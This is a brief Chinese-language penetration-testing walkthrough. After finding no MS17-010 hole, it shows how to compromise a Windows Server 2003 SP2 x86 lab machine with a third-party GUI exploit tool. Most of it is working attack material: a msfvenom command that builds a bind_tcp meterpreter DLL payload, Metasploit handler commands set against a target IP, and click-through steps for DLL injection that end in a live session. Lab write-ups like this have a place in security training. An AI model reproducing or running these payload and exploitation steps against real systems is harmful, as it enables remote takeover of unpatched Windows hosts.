没有发现17010相关漏洞
最后针对windows server 2003 sp2 x86的实验目标,演示一下abc123表哥的神器,解放双手
使用正向payload设置x86.dll 小马
msfvenom -p windows/meterpreter/bind_tcp LPORT=1003 -f dll > x86.dll
使用msfconsole正向监听
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set lport 1003
set rhost 192.168.50.205
run
将生成的x86.dll文件存放在图形化工具的根目录下,并将原有的x86.dll重命名
先点击生成bin,而后点击漏洞利用,最后点击dll注入
攻击成功后,发现msf上线